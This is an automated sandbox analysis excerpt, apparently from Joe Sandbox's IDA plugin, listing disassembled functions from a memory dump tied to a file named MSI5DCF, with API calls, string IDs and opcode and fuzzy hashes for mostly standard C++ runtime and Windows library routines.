                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: 9254e9c79a3b49ac82f684406710748a1e6dab3722e62b208c29f91ce71fc398
                                                                        • Instruction ID: 7aeb4909927d686e8fae2f5a9c34732c6eb6f92eff6b2d0ff66f1b3f0b5c85e9
                                                                        • Opcode Fuzzy Hash: 9254e9c79a3b49ac82f684406710748a1e6dab3722e62b208c29f91ce71fc398
                                                                        • Instruction Fuzzy Hash: 53019235D04659DBCB05EBA4DA456BE77B5BF84310F240549F9116B392DF34AE018B90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7C24
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7C2E
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • moneypunct.LIBCPMT ref: 00AE7C68
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7C7F
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7C9F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: a510b003330f75ce773fcfaee0149d753e26d984c122020ef62dd0180d369906
                                                                        • Instruction ID: 38460b95fbf017b6ad5ca14db25698b7ed2089d0ee23991b91e5f3a291d574d8
                                                                        • Opcode Fuzzy Hash: a510b003330f75ce773fcfaee0149d753e26d984c122020ef62dd0180d369906
                                                                        • Instruction Fuzzy Hash: F101D231D006598BCB11EBB5DA456BE77B5AFC0310F340549F4216B392DF34AE018B90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7DE3
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7DED
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • moneypunct.LIBCPMT ref: 00AE7E27
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7E3E
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7E5E
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: ecd24be0ed5f16e7c2855523b0f8bc06833b3b0a52c26042306fb8c961d9fcdb
                                                                        • Instruction ID: b3f483c8572e28ab83c1940cc9bace854c48d47b0ac5c82a6ce24d0ea8ce19db
                                                                        • Opcode Fuzzy Hash: ecd24be0ed5f16e7c2855523b0f8bc06833b3b0a52c26042306fb8c961d9fcdb
                                                                        • Instruction Fuzzy Hash: 8401D231D14659DBCB00EBA4E9456BE77B1AF84710F240549F5116B392CF34AE01CB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7D4E
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7D58
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • moneypunct.LIBCPMT ref: 00AE7D92
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7DA9
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7DC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: a2a933cb9116f816f07b9c91b7d6aa33804f2c398281e06ff704108a93ec890a
                                                                        • Instruction ID: 0703dfb377236b2f3b3bc0d6c10f664af6e0155362922b984eb14638f0f9b975
                                                                        • Opcode Fuzzy Hash: a2a933cb9116f816f07b9c91b7d6aa33804f2c398281e06ff704108a93ec890a
                                                                        • Instruction Fuzzy Hash: 6801F531D10659CBCB00EBA4DA45ABE77B1AF84310F240109F511AB392DF34AE01CBD0
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(00B34AF8,?,?,00AD2627,00B3571C,00B1CCC0), ref: 00AF7835
                                                                        • LeaveCriticalSection.KERNEL32(00B34AF8,?,?,00AD2627,00B3571C,00B1CCC0), ref: 00AF7868
                                                                        • RtlWakeAllConditionVariable.NTDLL ref: 00AF78DF
                                                                        • SetEvent.KERNEL32(?,00AD2627,00B3571C,00B1CCC0), ref: 00AF78E9
                                                                        • ResetEvent.KERNEL32(?,00AD2627,00B3571C,00B1CCC0), ref: 00AF78F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                        • String ID:
                                                                        • API String ID: 3916383385-0
                                                                        • Opcode ID: 7aa712466cfd02a724a4a7d6394ad2c3b521682f0c5bfafeda5a2280698c3b25
                                                                        • Instruction ID: bbde7faf8f2b50895b582059782627b9e219ab894cc5aa1aabe033f60ccf9e81
                                                                        • Opcode Fuzzy Hash: 7aa712466cfd02a724a4a7d6394ad2c3b521682f0c5bfafeda5a2280698c3b25
                                                                        • Instruction Fuzzy Hash: E6018C35A45220DBC708AF58FD08AAD7BA4FB09701B11406AF90293320CF746D01DBD4
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00AD60F4
                                                                        • GetLastError.KERNEL32 ref: 00AD6190
                                                                          • Part of subcall function 00AD1FC0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000000,00B1938D,000000FF,?,80070057,?,?,00000000,00000010,00AD1B09,?), ref: 00AD2040
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000009,00B2B2DC,00000001,00000000), ref: 00AD614E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryErrorFindLastLibraryLoadResourceSystem
                                                                        • String ID: ntdll.dll
                                                                        • API String ID: 4113295189-2227199552
                                                                        • Opcode ID: cfb371267356570601def1ad1de400bd8ed51306576288f900a0a97a02ba878b
                                                                        • Instruction ID: c5caa92878494fae4e45350ce1f5f073d547da016b1071456044b738288adf96
                                                                        • Opcode Fuzzy Hash: cfb371267356570601def1ad1de400bd8ed51306576288f900a0a97a02ba878b
                                                                        • Instruction Fuzzy Hash: 60319D71A00608DBD720DF68DD44BAEB7F4BB54710F14861EF42AD72D1EBB4A904CB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AED2C9
                                                                          • Part of subcall function 00AE6FF9: _Maklocstr.LIBCPMT ref: 00AE7019
                                                                          • Part of subcall function 00AE6FF9: _Maklocstr.LIBCPMT ref: 00AE7036
                                                                          • Part of subcall function 00AE6FF9: _Maklocstr.LIBCPMT ref: 00AE7053
                                                                          • Part of subcall function 00AE6FF9: _Maklocchr.LIBCPMT ref: 00AE7065
                                                                          • Part of subcall function 00AE6FF9: _Maklocchr.LIBCPMT ref: 00AE7078
                                                                        • _Mpunct.LIBCPMT ref: 00AED356
                                                                        • _Mpunct.LIBCPMT ref: 00AED370
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                        • String ID: $+xv
                                                                        • API String ID: 2939335142-1686923651
                                                                        • Opcode ID: 8828b97f2e43bd17667a843745fd77dd7a46e6bbe44dad1d579d59f996f484a0
                                                                        • Instruction ID: 43e4da4f886da0cfa18ec887643dba9e3161de1d758dbe6baa3814ad2cb0be7b
                                                                        • Opcode Fuzzy Hash: 8828b97f2e43bd17667a843745fd77dd7a46e6bbe44dad1d579d59f996f484a0
                                                                        • Instruction Fuzzy Hash: 0221A1B1904B926FDB25DF75C89077BBEF8AB0D300F044A5AE199C7A42D734E601CB90
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Mpunct$H_prolog3
                                                                        • String ID: $+xv
                                                                        • API String ID: 4281374311-1686923651
                                                                        • Opcode ID: c6ff1963ac976079a106a3133f4a39fd7807618770b8e172dc2f4cc24bd4a3aa
                                                                        • Instruction ID: 4a57d176512c344700c5579bf193d6a42d1ee55697fefcd8da92a1289649b545
                                                                        • Opcode Fuzzy Hash: c6ff1963ac976079a106a3133f4a39fd7807618770b8e172dc2f4cc24bd4a3aa
                                                                        • Instruction Fuzzy Hash: 322181B1904A966EDB25DFB5C4907BBBEF8BB0D700F04495AB159C7A41D734E601CB90
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00AFBFC3,00000000,?,00B34EA4,?,?,?,00AFC166,00000004,InitializeCriticalSectionEx,00B1F92C,InitializeCriticalSectionEx), ref: 00AFC01F
                                                                        • GetLastError.KERNEL32(?,00AFBFC3,00000000,?,00B34EA4,?,?,?,00AFC166,00000004,InitializeCriticalSectionEx,00B1F92C,InitializeCriticalSectionEx,00000000,?,00AFBF1D), ref: 00AFC029
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00AFC051
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$ErrorLast
                                                                        • String ID: api-ms-
                                                                        • API String ID: 3177248105-2084034818
                                                                        • Opcode ID: 0de2dac4c95b2f3a5be0c12e73f5999199c53ef7ce1b12840a119bd4a9ac97bf
                                                                        • Instruction ID: a817c40686221c83e2d65c0145dd3408d44c53d6648c5fc4a411d9d34cb9660a
                                                                        • Opcode Fuzzy Hash: 0de2dac4c95b2f3a5be0c12e73f5999199c53ef7ce1b12840a119bd4a9ac97bf
                                                                        • Instruction Fuzzy Hash: 97E0123064020CF7DF201BA1ED0ABA93B659B04B61F604420FA0CE50E0DF61E95295C4
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLocal_strcspn
                                                                        • String ID:
                                                                        • API String ID: 2585785616-0
                                                                        • Opcode ID: b267cb14784408047c6643dde9b75911f4b447b8fd61c6bc8f75a0b788ffd232
                                                                        • Instruction ID: d82387f53404195a8e29d1a3252c2dca2daf6bd6d4a5c0a553df3107d90cb81d
                                                                        • Opcode Fuzzy Hash: b267cb14784408047c6643dde9b75911f4b447b8fd61c6bc8f75a0b788ffd232
                                                                        • Instruction Fuzzy Hash: A9F12575A002499FDF14DFA8C984AEEBBF6FF48304F14416AE816AB351D731EA45CB90
                                                                        APIs
                                                                        • GetConsoleOutputCP.KERNEL32(B7207CF4,?,00000000,?), ref: 00B173EE
                                                                          • Part of subcall function 00B1002B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00B0C527,?,00000000,-00000008), ref: 00B100D7
                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B17649
                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B17691
                                                                        • GetLastError.KERNEL32 ref: 00B17734
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                        • String ID:
                                                                        • API String ID: 2112829910-0
                                                                        • Opcode ID: f74626d61def07980e07611611668e62bef2af0ba7d5414a338838c04a4ce89c
                                                                        • Instruction ID: f9dd7e26b69d1d2a7952482b8fdbb258e7f77c9e0e9e75df94912a2273119852
                                                                        • Opcode Fuzzy Hash: f74626d61def07980e07611611668e62bef2af0ba7d5414a338838c04a4ce89c
                                                                        • Instruction Fuzzy Hash: 8DD16BB5E046489FCB15CFA8D8809EDBBF5FF48300F6445AAE855E7391DB30A982CB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                        • String ID:
                                                                        • API String ID: 838279627-0
                                                                        • Opcode ID: 84cfdaf71f004bf55877096ba50f24075ff529ee2cd537e0f7cfaa9bbd42d0f3
                                                                        • Instruction ID: 454febaf46d237a90a67da655e315c049bf82c23a89c6fb6228f9f8a9aa526ce
                                                                        • Opcode Fuzzy Hash: 84cfdaf71f004bf55877096ba50f24075ff529ee2cd537e0f7cfaa9bbd42d0f3
                                                                        • Instruction Fuzzy Hash: B7C16C71D00289DFDF14DF99C9819EEBBB9FF48310F14406AE809AB251DB34AE45CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                        • String ID:
                                                                        • API String ID: 838279627-0
                                                                        • Opcode ID: f87b4940bb87bdc80d2df141f57534d119983bc44ea933acb4487deba7bf6bad
                                                                        • Instruction ID: c2d4fe9fd8be8446f848f097b3c656681d86b3ee22cccc8abe423af6e17f1595
                                                                        • Opcode Fuzzy Hash: f87b4940bb87bdc80d2df141f57534d119983bc44ea933acb4487deba7bf6bad
                                                                        • Instruction Fuzzy Hash: 8EC16D71D002899FDF15DFE5C981AEEBBB9FF48310F24442AE405AB251D734AE45CBA1
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF4F27
                                                                        • collate.LIBCPMT ref: 00AF4F33
                                                                          • Part of subcall function 00AF3E70: __EH_prolog3_GS.LIBCMT ref: 00AF3E77
                                                                          • Part of subcall function 00AF3E70: __Getcoll.LIBCPMT ref: 00AF3EDB
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • __Getcoll.LIBCPMT ref: 00AF4F76
                                                                          • Part of subcall function 00AF3CD4: __EH_prolog3.LIBCMT ref: 00AF3CDB
                                                                          • Part of subcall function 00AF3CD4: std::_Lockit::_Lockit.LIBCPMT ref: 00AF3CE5
                                                                          • Part of subcall function 00AF3CD4: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3D56
                                                                          • Part of subcall function 00AE4403: __EH_prolog3.LIBCMT ref: 00AE440A
                                                                          • Part of subcall function 00AE4403: std::_Lockit::_Lockit.LIBCPMT ref: 00AE4414
                                                                          • Part of subcall function 00AE4403: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE44BB
                                                                        • numpunct.LIBCPMT ref: 00AF51A6
                                                                          • Part of subcall function 00AD84C0: LocalAlloc.KERNEL32(00000040,00000000,00AF839D,00000000,B7207CF4,?,00000000,?,00000000,?,00B1CB8D,000000FF,?,00AD17D5,00000000,00B1D3BA), ref: 00AD84C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$Getcoll$AllocH_prolog3_Localcollatenumpunct
                                                                        • String ID:
                                                                        • API String ID: 2732324234-0
                                                                        • Opcode ID: 9b1ef92797df96bf9c5e7e6bd354bda78fb5001f0ea0a8e9ac92a2c8f21ff20c
                                                                        • Instruction ID: 9f3284cfb4074da907ceda5d41af8482705bae4e271cea729335ea7b2e45c8f7
                                                                        • Opcode Fuzzy Hash: 9b1ef92797df96bf9c5e7e6bd354bda78fb5001f0ea0a8e9ac92a2c8f21ff20c
                                                                        • Instruction Fuzzy Hash: 1791C7B2D00619ABDB20ABF58902B7F7EF8EF45760F11451EFA5997281EF74890087E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPointer
                                                                        • String ID:
                                                                        • API String ID: 1740715915-0
                                                                        • Opcode ID: 5979f58842caa2f3ca8cd6303c8b6bdd40d460da531e132d3ce13c70248eabb0
                                                                        • Instruction ID: 6298386e09d40a594d6f9ccc5e49e64b2505be7b141527de4790f445afa952e4
                                                                        • Opcode Fuzzy Hash: 5979f58842caa2f3ca8cd6303c8b6bdd40d460da531e132d3ce13c70248eabb0
                                                                        • Instruction Fuzzy Hash: 5D51B07661020EAFDB299F94D951BBBB7B4EF04350F244529FE1287291EB35EC40CBA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e055b3f79dad6f80d373905f4b5e91da1416ae164075e513f5ec08e3d8ecd617
                                                                        • Instruction ID: 6fe80d4ce3420cf5807e0c29617e645468da365a60513977e8b1a3b4a9d3808c
                                                                        • Opcode Fuzzy Hash: e055b3f79dad6f80d373905f4b5e91da1416ae164075e513f5ec08e3d8ecd617
                                                                        • Instruction Fuzzy Hash: C0216F71A48209BFDB20AF718D91D6ABBE9EF4036471089A5FA15D7291EF31FC5087A0
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,00000000,75EF5490,00AD8B3A,00000000,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD9027
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast
                                                                        • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                        • API String ID: 1452528299-1781106413
                                                                        • Opcode ID: 854aa65223e2f1157a8dc50b1c6699f64f28fa761c5d440f7878d2a491e3cd21
                                                                        • Instruction ID: f49de6ff9c7e71edb073ef63b18e0b9d952788d3abfe249c0c436d1f08c41bee
                                                                        • Opcode Fuzzy Hash: 854aa65223e2f1157a8dc50b1c6699f64f28fa761c5d440f7878d2a491e3cd21
                                                                        • Instruction Fuzzy Hash: 59217949A2026186CB301F28A41173AB2F0AF64755F28446FE8CADB394EE69CC82C391
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE440A
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE4414
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE44BB
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00AE44C6
